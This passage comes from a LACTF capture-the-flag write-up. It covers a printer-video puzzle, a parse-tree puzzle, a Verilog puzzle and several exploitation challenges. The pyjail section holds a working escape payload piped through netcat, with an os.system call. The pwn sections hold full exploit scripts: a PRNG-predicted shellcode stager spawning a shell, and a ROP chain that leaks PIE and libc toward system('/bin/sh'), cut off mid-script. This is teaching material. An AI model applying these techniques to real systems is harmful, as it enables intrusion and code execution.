During base layers (frames 0–\~26000), the head sweeps the full width uniformly (rectangular infill). During the top/text layers (frames \~26100–28350), the head only visits positions where letters exist, producing variable-width sweeps. After \~28400 the head parks at home position.

**Step 3: Reconstruct the 2D print path**

Plot head X vs bed X for the text-layer frames, filtering out fast travel moves (speed > 2 px/frame) to keep only slow printing moves. The resulting 2D histogram reveals the letter shapes.

```python
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from scipy.ndimage import gaussian_filter1d, gaussian_filter
import cv2

OUT = 'samples'

head = np.load(f'{OUT}/pos_1080.npy').astype(float)
bed = np.load(f'{OUT}/bed_pos_1080.npy')

hx = head[:, 0]  # head X = physical X (head moves left/right)
bx = bed[:, 0]   # bed X in video = physical Y (bed moves forward/back)

# Text layer region
s, e = 26100, 28350
hx_seg = gaussian_filter1d(hx[s:e], sigma=1)
bx_seg = gaussian_filter1d(bx[s:e], sigma=1)

# Compute per-frame speed, filter to slow (printing) moves only
dx = np.diff(hx_seg)
dy = np.diff(bx_seg)
speed = np.sqrt(dx**2 + dy**2)
speed = np.append(speed, 0)
mask = speed < 2.0

# Build 2D histogram (head X vs bed X)
x_min, x_max = 975, 1295
y_min, y_max = 1510, 1645
bins_x = int(x_max - x_min)
bins_y = int((y_max - y_min) * 2)  # 2x oversample Y for resolution

hist, _, _ = np.histogram2d(
    hx_seg[mask], bx_seg[mask],
    bins=[bins_x, bins_y],
    range=[[x_min, x_max], [y_min, y_max]]
)

# Render as image (transpose to get rows=Y, cols=X)
img = hist.T

# Crop to text bounding box
mask2 = img > 0
rows = np.any(mask2, axis=1)
cols = np.any(mask2, axis=0)
rmin, rmax = np.where(rows)[0][[0, -1]]
cmin, cmax = np.where(cols)[0][[0, -1]]
cropped = img[max(0, rmin - 2):rmax + 2, max(0, cmin - 2):cmax + 2]

# Scale up and smooth for readability
h, w = cropped.shape
big = cv2.resize(cropped.astype(np.float32), (w * 8, h * 8),
                 interpolation=cv2.INTER_LINEAR)
smooth = gaussian_filter(big, sigma=2.5)

plt.figure(figsize=(30, 15))
plt.imshow(smooth, cmap='hot', interpolation='bilinear', aspect='equal')
plt.axis('off')
plt.tight_layout()
plt.savefig('flag_text.png', dpi=200, bbox_inches='tight')
plt.close()
```

The resulting heatmap shows three rows of text. At this resolution the font renders `f` like `P`, `g`/`e` like `G`, and `}` like `3`, but the text is readable:

```
4n_irl_fla
6_f0r_onc3
}
```

Prepending the `lactf{` prefix (from Row 1, which is faintest due to fewer data points at the start of the text layer):

#### Flag

```
lactf{4n_irl_fla6_f0r_onc3}
```

### grammar

#### Description

Inspired by CS 131 Programming Languages, I decided to make a context-free grammar in EBNF for my flag! But it looks like some squirrels have eaten away at the parse tree...

Provided files: `grammar-notes.txt` (EBNF grammar + notes about the tree) and `tree.png` (parse tree with opaque terminal boxes).

#### Solution

The challenge provides an EBNF grammar that generates flags and a parse tree image where the terminal characters (boxes at the bottom) are blacked out. The goal is to reconstruct the flag by reading the nonterminal chain depths from the tree.

**Grammar analysis:**

The grammar produces flags of the form `lactf{word1_word2_...}` where each word is composed of fragments. Each fragment is one of 5 types:

* `cd` (consonant + digit) - 2 characters
* `vc` (vowel + consonant) - 2 characters
* `vd` (vowel + digit) - 2 characters
* `c` (consonant) - 1 character
* `d` (digit) - 1 character

Each character type chains through numbered nonterminals, so the chain depth determines the specific character:

* Consonants: depth 1=f, 2=g, 3=p, 4=t, 5=r
* Vowels: depth 1=e, 2=o, 3=u
* Digits: depth 1=0, 2=1, 3=4, 4=5

**Tree analysis:**

The notes state colored circles represent fragment types with sequence `ABACDE BC EAEA` (3 words). The image is 1920x1080 with 28 terminal boxes at the bottom.

Step 1: Determine which fragment types are 1-char vs 2-char by checking if colored circle x-positions align with 1 or 2 terminal boxes:

* For 2-char fragments, the colored circle sits at the midpoint of its two terminal boxes
* Spatial analysis confirmed: **A, D = 1-char; B, C, E = 2-char**

This gives 6+9+1+4+1+6+1 = 28 terminal boxes, matching the image.

Step 2: Count black circle depths above each terminal box. The tree has 5 rows of black circles between the colored circles (y~~400) and terminal boxes (y~~1000). Circles stack from the bottom up: depth-1 chains have 1 circle at the bottom row, depth-5 chains fill all 5 rows.

Step 3: Determine fragment type assignments using depth constraints:

* **B** has a left branch with depth 5: only `cd` allows con(5)=r on the left (vowels max at depth 3) → **B = cd**
* **E** has a right branch with depth 5: only `vc` allows con(5)=r on the right → **E = vc**
* By elimination → **C = vd**
* **A = c** (consonant), **D = d** (digit) chosen because it produces readable text

Step 4: Decode each fragment:

| Fragment | Depths   | Type | Characters |
| -------- | -------- | ---- | ---------- |
| A1       | 3        | c    | p          |
| B1       | L:5, R:1 | cd   | r0         |
| A2       | 1        | c    | f          |
| C1       | L:1, R:4 | vd   | e5         |
| D1       | 4        | d    | 5          |
| E1       | L:2, R:5 | vc   | or         |
| B2       | L:3, R:3 | cd   | p4         |
| C2       | L:3, R:2 | vd   | u1         |
| E2       | L:1, R:2 | vc   | eg         |
| A3       | 2        | c    | g          |
| E3       | L:1, R:5 | vc   | er         |
| A4       | 4        | c    | t          |

Result: `pr0fe55or` \_ `p4u1` \_ `eggert` = "professor paul eggert" (the UCLA professor who teaches CS 131).

```python
from PIL import Image
import numpy as np

img = Image.open('attachments/tree.png')
arr = np.array(img)
gray = np.mean(arr[:,:,:3], axis=2)

# Circle row y-centers (row1=top/deepest chains, row5=bottom/all chains)
row_centers = [610, 690, 770, 845, 920]
threshold = 500
window_x, window_y = 15, 20

# Content terminal box x-centers and fragment assignments
# A,D = 1-char; B=cd, C=vd, E=vc
content_map = [
    ("A1", 474, "c"), ("B1_L", 538, "con"), ("B1_R", 603, "dig"),
    ("A2", 668, "c"), ("C1_L", 732, "vow"), ("C1_R", 797, "dig"),
    ("D1", 862, "d"), ("E1_L", 927, "vow"), ("E1_R", 991, "con"),
    ("B2_L", 1121, "con"), ("B2_R", 1186, "dig"),
    ("C2_L", 1250, "vow"), ("C2_R", 1315, "dig"),
    ("E2_L", 1444, "vow"), ("E2_R", 1509, "con"),
    ("A3", 1574, "c"), ("E3_L", 1639, "vow"), ("E3_R", 1703, "con"),
    ("A4", 1768, "c"),
]

char_maps = {
    'con': {1:'f', 2:'g', 3:'p', 4:'t', 5:'r'},
    'vow': {1:'e', 2:'o', 3:'u'},
    'dig': {1:'0', 2:'1', 3:'4', 4:'5'},
    'c':   {1:'f', 2:'g', 3:'p', 4:'t', 5:'r'},  # consonant
    'd':   {1:'0', 2:'1', 3:'4', 4:'5'},           # digit
}

flag_chars = []
for label, cx, ctype in content_map:
    depth = 0
    for i in range(4, -1, -1):  # Check rows bottom to top
        ry = row_centers[i]
        x_lo, x_hi = max(0, cx - window_x), min(1919, cx + window_x)
        y_lo, y_hi = max(0, ry - window_y), min(1079, ry + window_y)
        dark = np.sum(gray[y_lo:y_hi+1, x_lo:x_hi+1] < 50)
        if dark > threshold:
            depth += 1
        else:
            break
    flag_chars.append(char_maps[ctype][depth])

# Assemble: word1(9 chars) _ word2(4 chars) _ word3(6 chars)
w1 = ''.join(flag_chars[0:9])
w2 = ''.join(flag_chars[9:13])
w3 = ''.join(flag_chars[13:19])
print(f"lactf{{{w1}_{w2}_{w3}}}")
```

**Flag: `lactf{pr0fe55or_p4u1_eggert}`**

### literally-1984

#### Description

We are given a Python 3.14 “pyjail”:

* Input is length-limited (`< 67`) and must be printable ASCII.
* Blacklisted characters: space, `_`, `.`, `\\`, `"`, `'`, `{}`, `#`, `=`.
* Our input is wrapped into `eval(f"print({inp})")` inside a **subinterpreter** with an audit hook that kills the process after more than 3 audit events.

Goal: get the real flag (the container includes an execute-only `printflag` binary).

#### Solution

Key observation: `concurrent.interpreters.Interpreter.call()` pickles/unpickles arguments and return values across interpreters. The audit hook is only installed in the *subinterpreter*, not in the main interpreter.

So we:

1. Break out of the `print(<inp>)` wrapper by starting our input with `)or(`, making the overall evaluated expression:
   * `print() or (<our expression>)`
2. Modify a picklable object (`exit`, a `_sitebuiltins.Quitter` instance) to override its `__reduce_ex__` method (without typing underscores, using `dir(0)[41]` which is the string `"__reduce_ex__"`).
3. Return that `exit` object, forcing the subinterpreter to pickle it.
4. During *unpickling in the main interpreter*, our custom reduction runs.

Instead of trying to directly reach `os.system` under the tight 66-character limit, we make unpickling call `breakpoint()`, which drops into `pdb`. Even though the jail only reads one line for `inp`, the TCP stream can include additional lines; `pdb` will read them from stdin next. We pre-send:

* `!import os;os.system('/app/printflag')` (note: pwn.red/jail chroots to `/srv`, so the binary is at `/app/printflag`)
* `c` to continue execution and let the process exit cleanly

**One-shot exploit input (first line):**

```
)or(setattr(exit,dir(0)[41],lambda*s:(breakpoint,()))or(exit)
```

**Example run with netcat (sends pdb commands after the payload):**

```bash
{ \
  printf '%s\n' ")or(setattr(exit,dir(0)[41],lambda*s:(breakpoint,()))or(exit)"; \
  printf '%s\n' "!import os;os.system('/app/printflag')"; \
  printf '%s\n' c; \
} | nc chall.lac.tf 32323
```

**Automated solver (no external deps):** `solve.py`

```python
#!/usr/bin/env python3
import re
import socket
import time


HOST = "chall.lac.tf"
PORT = 32323


PAYLOAD = ")or(setattr(exit,dir(0)[41],lambda*s:(breakpoint,()))or(exit)"
# pwn.red/jail chroots to /srv, so /srv/app/printflag becomes /app/printflag.
PDB_CMD = "!import os;os.system('/app/printflag')"


def main() -> None:
    script = f"{PAYLOAD}\n{PDB_CMD}\nc\n"
    with socket.create_connection((HOST, PORT), timeout=10) as s:
        s.settimeout(5)

        # Read (best effort) until we see the prompt.
        buf = b""
        deadline = time.monotonic() + 10
        while b"1984> " not in buf and time.monotonic() < deadline:
            try:
                chunk = s.recv(4096)
            except TimeoutError:
                continue
            if not chunk:
                break
            buf += chunk

        s.sendall(script.encode())

        # Read until the server closes the connection (or a generous deadline).
        deadline = time.monotonic() + 30
        while time.monotonic() < deadline:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                continue
            if not chunk:
                break
            buf += chunk
            deadline = time.monotonic() + 5  # extend while data arrives

    text = buf.decode(errors="replace")
    m = re.search(r"lactf{[^}]+}", text)
    if not m:
        raise SystemExit("flag not found in output")
    print(m.group(0))


if __name__ == "__main__":
    main()
```

### not-just-a-hobby

#### Description

"It's not just a hobby!!!" - A single Verilog file `v.v` is provided.

#### Solution

The challenge provides a Verilog VGA module with 7-bit inputs (`input [6:0] x, input [6:0] y`) but comparisons against values that exceed the 7-bit range (0-127). The key insight is understanding Verilog bit-width semantics:

* `7'd588`: A 7-bit decimal literal — 588 gets truncated to `588 % 128 = 76`. This comparison **can** match.
* `588` (no width prefix): A 32-bit literal. Since `x` is only 7 bits (0-127), `x == 588` **never** matches.

A pixel coordinate is only "active" (drawn black) when **both** the x and y comparisons are satisfiable with 7-bit inputs. This means:

* Values with `7'd` prefix: truncate via `value % 128`, always reachable
* Bare values ≤ 127: directly reachable
* Bare values > 127: unreachable, the pixel comparison is dead code

Applying this filter and rendering the valid pixels on a 128x128 canvas reveals an image of the "Graphic Design Is My Passion" meme rendered in leet speak, with a stick figure holding an LACTF flag and a small creature.

The text reads across four lines: `lactf{graph1c_d3sign_` / `is_My_` / `PA55i0N!!1!}`

The leet speak substitutions are: `i→1` (graphic), `e→3` (design), `S→5` (PASSION), `O→0` (PASSION).

**Flag:** `lactf{graph1c_d3sign_is_My_PA55i0N!!1!}`

**Solver script:**

```python
import re
from PIL import Image

with open('attachments/v.v', 'r') as f:
    content = f.read()

# Parse all (x == VALUE && y == VALUE) coordinate pairs
pattern = r"\(x\s*==\s*(7'd)?(\d+)\s*&&\s*y\s*==\s*(7'd)?(\d+)\)"
matches = re.findall(pattern, content)

pixels = set()
for x_prefix, x_val, y_prefix, y_val in matches:
    x_val, y_val = int(x_val), int(y_val)

    # Apply 7-bit truncation for 7'd prefixed values
    if x_prefix == "7'd":
        x_actual = x_val % 128
    elif x_val <= 127:
        x_actual = x_val
    else:
        continue  # Unreachable with 7-bit input

    if y_prefix == "7'd":
        y_actual = y_val % 128
    elif y_val <= 127:
        y_actual = y_val
    else:
        continue  # Unreachable with 7-bit input

    pixels.add((x_actual, y_actual))

# Render 128x128 image
img = Image.new('RGB', (128, 128), 'white')
for x, y in pixels:
    img.putpixel((x, y), (0, 0, 0))

img_scaled = img.resize((512, 512), Image.NEAREST)
img_scaled.save('output.png')
print(f"Rendered {len(pixels)} pixels")
```

***

## pwn

### ScrabASM

#### Description

Scrabble for ASM! A pwn challenge where the program generates 14 random byte "tiles", allows swapping individual tiles (replaced with the next `rand() & 0xFF` value), and then copies the 14-byte hand to an RWX page at `0x13370000` and executes it as shellcode. The key constraints: only 14 bytes of shellcode, swaps produce random values you can't see, and `srand(time(NULL))` seeds the PRNG.

#### Solution

**Approach:** Brute-force the PRNG seed from the displayed initial hand, predict all future `rand()` values, then use a greedy algorithm to construct a 14-byte read stager that loads full shellcode as a second stage.

**Stager shellcode (14 bytes):** Calls `read(0, 0x1337000e, 255)` to read stage 2 shellcode from stdin directly after the stager. After `syscall` returns, execution falls through to offset `0x0e` where stage 2 was written.

```asm
xor eax, eax          ; syscall 0 = read
xor edi, edi           ; fd = 0 (stdin)
cdq                    ; rdx = 0 (sign-extend eax)
mov esi, 0x1337000e    ; buf = right after stager
mov dl, 0xff           ; count = 255
syscall                ; falls through to stage 2 at offset 0x0e
```

**Greedy tile assignment:** Rather than processing tiles sequentially (each tile swapped until correct, \~3000 swaps), each `rand()` value is checked against ALL unfinished tiles. If it matches any tile's target byte, that tile is assigned. Otherwise the value is wasted on any unfinished tile. This reduces swaps from \~3000 to \~800, critical for staying within the server timeout.

```python
#!/usr/bin/env python3
from pwn import *
import ctypes
import time as time_mod
import re

context.arch = 'amd64'
context.os = 'linux'

libc = ctypes.CDLL("libc.so.6")
HAND_SIZE = 14

stager = asm("""
    xor eax, eax
    xor edi, edi
    cdq
    mov esi, 0x1337000e
    mov dl, 0xff
    syscall
""")
assert len(stager) == HAND_SIZE

stage2 = asm(shellcraft.sh())

p = remote("chall.lac.tf", 31338)
connect_time = int(time_mod.time())

data = p.recvuntil(b"> ")
hand_hex = re.findall(r'\| ([0-9a-f]{2}) ', data.decode())
initial_hand = [int(h, 16) for h in hand_hex[:HAND_SIZE]]

# Brute force srand(time(NULL)) seed from displayed hand
found_seed = None
for delta in range(-300, 60):
    seed = connect_time + delta
    libc.srand(seed)
    predicted = [libc.rand() & 0xFF for _ in range(HAND_SIZE)]
    if predicted == initial_hand:
        found_seed = seed
        break
assert found_seed is not None

# Advance PRNG past initial hand generation
libc.srand(found_seed)
for _ in range(HAND_SIZE):
    libc.rand()

# Greedy swap plan
plan = []
sim = list(initial_hand)
unfinished = {}
targets = {}
for i in range(HAND_SIZE):
    if sim[i] != stager[i]:
        unfinished[i] = stager[i]
        targets.setdefault(stager[i], set()).add(i)

while unfinished:
    val = libc.rand() & 0xFF
    if val in targets and targets[val]:
        tile = targets[val].pop()
        if not targets[val]:
            del targets[val]
        del unfinished[tile]
        plan.append(tile)
        sim[tile] = val
    else:
        dummy = next(iter(unfinished))
        plan.append(dummy)
        sim[dummy] = val

# Send all swaps + play as a single batch
payload = b""
for idx in plan:
    payload += f"1\n{idx}\n".encode()
payload += b"2\n"
p.send(payload)

p.recvuntil(b"TRIPLE WORD SCORE!", timeout=300)
time_mod.sleep(0.5)
p.send(stage2)
p.sendline(b"cat /app/flag.txt")
p.interactive()
```

**Flag:** `lactf{gg_y0u_sp3ll3d_sh3llc0d3}`

### adventure

#### Description

Text-adventure pwnable.

Remote: `nc chall.lac.tf 31337`

#### Solution

The game is a 16x16 grid with 8 items. Grabbing the Flag triggers a password prompt.

**1) Bug: stack overflow in `check_flag_password`**

In `attachments/chall.c`:

* `char password[0020];` where `0020` is octal = 16 bytes
* `fgets(password, 0x20, stdin);` reads up to 31 bytes + NUL

So we can overwrite saved `rbp` and the return address.

**2) Leak PIE base via board layout**

`init_board()` places each item using a byte of the *runtime* address of `main`:

* For item index `i`, it uses `bytes[i]` (byte `i` of the little-endian `main` pointer)
* `x = high_nibble(bytes[i])`, `y = low_nibble(bytes[i])`
* If the cell collides, it linearly probes forward.

By walking the whole grid (serpentine), we record each item’s final `(x,y)`. We then invert the placement algorithm to recover `main` and compute:

* `pie_base = main_addr - 0x1adf`

Collision probing can create ambiguities; the exploit resolves them by enforcing that `(main_addr - 0x1adf) & 0xfff == 0` (PIE base must be page-aligned).

**3) Turn the overflow into a `.bss` write primitive**

We return into the middle of `check_flag_password` right before its `fgets` call (`FGETS_SETUP`), with a controlled `rbp`.

Setting `rbp = pie_base + 0x4030` makes the buffer pointer used by that `fgets` (`rbp - 0x10`) equal `pie_base + 0x4020`, which is the global `last_item` pointer. That `fgets` becomes a 31-byte write into the writable `.bss` page.

**4) Leak libc via `last_item` printing**

`print_inventory()` prints `last_item` with `%-6s`. If we overwrite `last_item = &GOT[puts]`, the inventory line outputs the raw little-endian bytes of the resolved libc `puts` pointer (until the first NUL), giving a libc leak and therefore `libc_base`.

**5) ROP chain and pivots**

The binary has no `pop rdi; ret`, so the exploit uses:

* The global `history` array as a tiny ROP stack (each command can store 6 bytes of an address).
* A double `leave; ret` pivot to start executing from `history`.
* Two more redirected `fgets` calls to write a minimal libc ROP chain into high `.bss`.

Final libc chain calls `system("/bin/sh")`, then the exploit sends `cat /app/flag.txt`.

**6) Flag path in jail**

The Dockerfile copies the rootfs to `/srv` and then runs under `pwn.red/jail`, which typically chroots into `/srv`. That makes `/srv/app/flag.txt` in the image visible as `/app/flag.txt` to the running program and spawned shell.

**Exploit**

```python
#!/usr/bin/env python3
from pwn import *
import re
import sys

context.binary = ELF('./attachments/chall', checksec=False)
context.log_level = 'info'

LIBC_PATH = '/lib/x86_64-linux-gnu/libc.so.6'
libc = ELF(LIBC_PATH, checksec=False)

# Binary offsets
MAIN        = 0x1ADF
CHECK_FLAG  = 0x15B5
FGETS_SETUP = 0x164D  # mid-check_flag_password: loads stdin, lea rax,[rbp-0x10], fgets
LEAVE_RET   = 0x14B7
POP_RBP_RET = 0x1233
RET         = 0x101A
PRINT_INV   = 0x138B
GOT_PUTS    = 0x3F98
LAST_ITEM   = 0x4020
HISTORY     = 0x40A0

# High scratch in the single RW .bss page (PIE+0x4000..PIE+0x4fff). Keep this near
# the end of the page so libc calls won't smash copy-relocated globals (stdout/stderr).
# Also pick %16 == 8 for correct system() entry alignment.
CHAIN_BASE  = 0x4FC8

NUM_ITEMS = 8
BOARD_SIZE = 16

def connect():
    if args.REMOTE or args.R:
        return remote('chall.lac.tf', 31337)
    elif args.STRACE:
        # Useful for confirming whether our final ROP actually reaches system()
        # (look for execve("/bin/sh", ...) in /tmp/adventure.strace).
        return process(['strace', '-f', '-o', '/tmp/adventure.strace', './attachments/chall'])
    else:
        return process('./attachments/chall')

def send_cmd(r, cmd):
    """Send a game command and return the response."""
    r.sendline(cmd.encode() if isinstance(cmd, str) else cmd)
    resp = r.recvuntil(b'> ', timeout=10)
    return resp

def send_raw_cmd(r, data):
    """Send raw bytes as a command (for planting chain in history)."""
    r.send(data)
    # Need newline to complete the fgets
    # Actually the data already includes newline at the end
    resp = r.recvuntil(b'> ', timeout=10)
    return resp

def explore_board(r):
    """Walk the board in serpentine pattern, find all items. Returns dict {item_idx: (x, y)}."""
    items = {}
    px, py = 0, 0  # start position

    def parse_spot(resp):
        """Check if we spotted an item."""
        for i, name in enumerate(["Sword", "Shield", "Potion", "Key", "Scroll", "Amulet", "Crown", "Flag"]):
            if f"spot a {name}".encode() in resp or f"glimmering {name}".encode() in resp:
                return i, name
        return None, None

    # Check starting position (0,0)
    resp = send_cmd(r, "look")
    idx, name = parse_spot(resp)
    if idx is not None:
        items[idx] = (px, py)
        log.info(f"Found {name} (idx={idx}) at ({px},{py})")

    moves_used = 1  # for the 'look' command

    # Serpentine walk
    for row in range(BOARD_SIZE):
        if row > 0:
            resp = send_cmd(r, "s")
            py += 1
            moves_used += 1
            idx, name = parse_spot(resp)
            if idx is not None:
                items[idx] = (px, py)
                log.info(f"Found {name} (idx={idx}) at ({px},{py})")

        if row % 2 == 0:
            # Go east
            for col in range(BOARD_SIZE - 1):
                resp = send_cmd(r, "e")
                px += 1
                moves_used += 1
                idx, name = parse_spot(resp)
                if idx is not None:
                    items[idx] = (px, py)
                    log.info(f"Found {name} (idx={idx}) at ({px},{py})")
                if len(items) == NUM_ITEMS:
                    return items, px, py, moves_used
        else:
            # Go west
            for col in range(BOARD_SIZE - 1):
                resp = send_cmd(r, "w")
                px -= 1
                moves_used += 1
                idx, name = parse_spot(resp)
                if idx is not None:
                    items[idx] = (px, py)
                    log.info(f"Found {name} (idx={idx}) at ({px},{py})")
                if len(items) == NUM_ITEMS:
                    return items, px, py, moves_used

    return items, px, py, moves_used

def reconstruct_address(items):
    """Given item positions, reconstruct the address of main."""
    # bytes[7] and bytes[6] are 0x00 (48-bit canonical address)
    candidates = {i: [] for i in range(8)}
    candidates[6] = [0]
    candidates[7] = [0]

    # Items placed in order i=7,6,...,0. The final position of item i depends on
    # byte[i] and the occupied cells from items i+1..7.
    for i in range(5, -1, -1):
        occupied = {items[j] for j in range(i + 1, NUM_ITEMS) if j in items}
        want = items.get(i)
        if want is None:
            raise ValueError(f"missing item {i} for PIE reconstruction")

        for b in range(256):
            x = (b >> 4) & 0x0F
            y = b & 0x0F
            while (x, y) in occupied:
                x = (x + 1) % BOARD_SIZE
                if x == 0:
                    y = (y + 1) % BOARD_SIZE
            if (x, y) == want:
                candidates[i].append(b)

        if not candidates[i]:
            raise ValueError(f"no candidates for byte {i}")

    # Resolve ambiguities by enforcing that the derived PIE base is page-aligned:
    #   pie_base = main_addr - MAIN  =>  (main_addr - MAIN) & 0xfff == 0
    target_low12 = MAIN & 0xFFF

    best = None
    # Prune early using the low 12-bit constraint once byte0/byte1 are chosen.
    for b0 in candidates[0]:
        for b1 in candidates[1]:
            low12 = b0 | ((b1 & 0x0F) << 8)
            if low12 != target_low12:
                continue
            for b2 in candidates[2]:
                for b3 in candidates[3]:
                    for b4 in candidates[4]:
                        for b5 in candidates[5]:
                            addr = (
                                (b0 << 0)  |
                                (b1 << 8)  |
                                (b2 << 16) |
                                (b3 << 24) |
                                (b4 << 32) |
                                (b5 << 40)
                            )
                            # bytes[6]=bytes[7]=0 already.
                            if ((addr - MAIN) & 0xFFF) != 0:
                                continue
                            best = addr
                            break
                        if best is not None:
                            break
                    if best is not None:
                        break
                if best is not None:
                    break
            if best is not None:
                break
        if best is not None:
            break

    if best is None:
        raise ValueError("PIE reconstruction ambiguous; no page-aligned solution")
    return best

def navigate_to(r, px, py, tx, ty):
    """Navigate from (px,py) to (tx,ty). Returns moves used."""
    moves = 0
    while px != tx:
        if px < tx:
            send_cmd(r, "e")
            px += 1
        else:
            send_cmd(r, "w")
            px -= 1
        moves += 1
    while py != ty:
        if py < ty:
            send_cmd(r, "s")
            py += 1
        else:
            send_cmd(r, "n")
            py -= 1
        moves += 1
    return moves, px, py

def plant_history_entry(r, addr_value):
    """Send a game command that stores addr_value in the current history entry.
    addr_value is an 8-byte int. We send the low 6 bytes + newline."""
    addr_bytes = p64(addr_value)
    # The main loop stores commands as C strings (strcspn/strncpy/strlen/strcmp).
    # If any of the first 6 bytes are NUL or LF, the history entry will truncate
    # and our "address" qword becomes garbage. Treat this as a hard failure and
    # retry with a fresh ASLR layout.
    for j in range(6):
        if addr_bytes[j] == 0x00:
            raise ValueError(f"history addr has NUL at byte {j}: {hex(addr_value)}")
        if addr_bytes[j] == 0x0a:
            raise ValueError(f"history addr has LF at byte {j}: {hex(addr_value)}")

    payload = addr_bytes[:6] + b'\n'
    r.send(payload)
    resp = r.recvuntil(b'> ', timeout=10)
    return resp

def overflow_payload(rbp_val, ret_val):
    """Build the 31-byte overflow payload for check_flag_password.
    16 bytes padding + 8 bytes rbp + 7 bytes ret (8th byte = 0x00 from fgets)."""
    payload = b'A' * 16
    payload += p64(rbp_val)
    payload += p64(ret_val)[:7]  # 7 bytes, 8th set to 0x00 by fgets
    assert len(payload) == 31
    return payload

def fgets_redirect_payload(write_val_0, write_val_1, new_rbp, ret_addr):
    """Build the 31-byte payload for the redirected fgets.
    Writes to [old_rbp - 0x10]:
    bytes 0-7: write_val_0 (at target)
    bytes 8-15: write_val_1 (at target+8)
    bytes 16-23: new_rbp (for leave;ret)
    bytes 24-30: ret_addr low 7 bytes (for leave;ret)
    """
    payload = p64(write_val_0)
    payload += p64(write_val_1)
    payload += p64(new_rbp)
    payload += p64(ret_addr)[:7]
    assert len(payload) == 31
    return payload

def has_bad_newline_bytes(data: bytes) -> bool:
    return b'\n' in data

def ensure_no_newline(payload: bytes, label: str):
    if has_bad_newline_bytes(payload):
        raise ValueError(f"{label} contains newline byte; fgets would truncate it")

def wait_password(r):
    return r.recvuntil(b'Password: ', timeout=15)

def exploit_once():
    r = connect()

    # Receive banner and help
    r.recvuntil(b'> ', timeout=15)

    log.info("=== Phase 1: Board Exploration & PIE Leak ===")
    items, px, py, moves_used = explore_board(r)
    log.info(f"Found {len(items)} items in {moves_used} moves. Position: ({px},{py})")

    if len(items) < NUM_ITEMS:
        log.warning(f"Only found {len(items)}/8 items!")
        for i in range(NUM_ITEMS):
            if i not in items:
                log.warning(f"  Missing item {i}")

    # Reconstruct PIE base
    main_addr = reconstruct_address(items)
    pie_base = main_addr - MAIN
    log.info(f"Reconstructed main addr: {hex(main_addr)}")
    log.info(f"PIE base: {hex(pie_base)}")

    # Verify sanity
    if pie_base & 0xFFF != 0:
        log.error("PIE base not page-aligned! Something went wrong.")
        r.close()
        return
    if (pie_base >> 40) not in [0x55, 0x56, 0x00]:
        log.warning(f"Unusual PIE base high byte: {hex(pie_base >> 40)}")

    # Check for bad bytes in key addresses
    def check_addr(name, addr):
        bs = p64(addr)
        for j in range(6):
            if bs[j] == 0x00:
                log.warning(f"{name} ({hex(addr)}) has null at byte {j}")
                return False
            if bs[j] == 0x0a:
                log.warning(f"{name} ({hex(addr)}) has newline at byte {j}")
                return False
        return True

    check_addr("PRINT_INV", pie_base + PRINT_INV)
    check_addr("MAIN", pie_base + MAIN)
    check_addr("LEAVE_RET", pie_base + LEAVE_RET)

    log.info("=== Phase 2: Plant ROP Chains In History ===")
    # chainA:
    #   dummy_rbp
    #   print_inventory               (leaks puts via last_item=&GOT[puts])
    #   pop rbp; ret
    #   rbp = CHAIN_BASE+0x10
    #   FGETS_SETUP                   (stage3 write1 input)
    #
    # chainB:
    #   dummy_rbp
    #   pop rbp; ret
    #   rbp = CHAIN_BASE+0x20
    #   FGETS_SETUP                   (stage3 write2 input)
    chain_base_addr = pie_base + CHAIN_BASE
    chainA_idx = moves_used
    chainA_addr = pie_base + HISTORY + 8 * chainA_idx
    chainB_idx = chainA_idx + 5
    chainB_addr = pie_base + HISTORY + 8 * chainB_idx

    log.info(f"Planting chainA at history[{chainA_idx}] (addr={hex(chainA_addr)})")
    send_cmd(r, "AAAAAA")  # dummy rbp (<=6 bytes: consumes newline)
    moves_used += 1
    plant_history_entry(r, pie_base + PRINT_INV)
    moves_used += 1
    plant_history_entry(r, pie_base + POP_RBP_RET)
    moves_used += 1
    plant_history_entry(r, chain_base_addr + 0x10)
    moves_used += 1
    plant_history_entry(r, pie_base + FGETS_SETUP)
    moves_used += 1

    log.info(f"Planting chainB at history[{chainB_idx}] (addr={hex(chainB_addr)})")
    send_cmd(r, "BBBBBB")  # dummy rbp
    moves_used += 1
    plant_history_entry(r, pie_base + POP_RBP_RET)
    moves_used += 1
    plant_history_entry(r, chain_base_addr + 0x20)
    moves_used += 1
    plant_history_entry(r, pie_base + FGETS_SETUP)
    moves_used += 1

    log.info(f"Chains planted. Moves used: {moves_used}")

    log.info("=== Phase 3: Navigate to Flag and Grab ===")
    flag_pos = items.get(7)
    if flag_pos is None:
        log.error("Flag item not found on board!")
        r.close()
        return

    nav_moves, px, py = navigate_to(r, px, py, flag_pos[0], flag_pos[1])
    moves_used += nav_moves
    log.info(f"Navigated to Flag at {flag_pos}. Moves: {moves_used}")

    # Grab the flag - this triggers check_flag_password
    r.sendline(b"grab")
    moves_used += 1
    # Should get the flag password prompt
    resp = wait_password(r)
    log.info("Got password prompt (1st check_flag_password)")

    log.info("=== Phase 4: Overflow → Jump To FGETS_SETUP (Write last_item) ===")
    # rbp = PIE+0x4030, so buffer=rbp-0x10 points to last_item (PIE+0x4020).
    payload1 = overflow_payload(pie_base + 0x4030, pie_base + FGETS_SETUP)
    ensure_no_newline(payload1, "overflow_to_fgets")
    r.send(payload1)

    log.info("=== Phase 5: Redirected Fgets Payload (last_item=&GOT[puts], pivot chainA) ===")
    payload2 = fgets_redirect_payload(
        write_val_0 = pie_base + GOT_PUTS,    # last_item = &GOT[puts]
        write_val_1 = 0x4141414141414141,    # padding at PIE+0x4028
        new_rbp     = chainA_addr,           # pivot to chainA
        ret_addr    = pie_base + LEAVE_RET,
    )
    ensure_no_newline(payload2, "redirected_fgets_leak")
    r.send(payload2)

    log.info("=== Phase 7: Parse Libc Leak ===")
    # We should now run print_inventory (leak) and return into check_flag_password.
    r.recvuntil(b'/300 ', timeout=15)
    leaked_bytes = r.recvn(6, timeout=5)
    puts_addr = u64(leaked_bytes + b'\x00\x00')
    libc_base = puts_addr - libc.symbols['puts']
    log.info(f"Leaked puts address: {hex(puts_addr)}")
    log.info(f"Libc base: {hex(libc_base)}")

    if libc_base & 0xFFF != 0:
        log.error("Libc base not page-aligned; leak likely failed.")
        r.close()
        return

    log.info("=== Phase 8: Stage 3 system('/bin/sh') (No Banner) ===")
    rop_libc = ROP(libc)
    pop_rdi = rop_libc.find_gadget(['pop rdi', 'ret']).address + libc_base
    binsh = next(libc.search(b'/bin/sh\x00')) + libc_base
    system = libc.symbols['system'] + libc_base

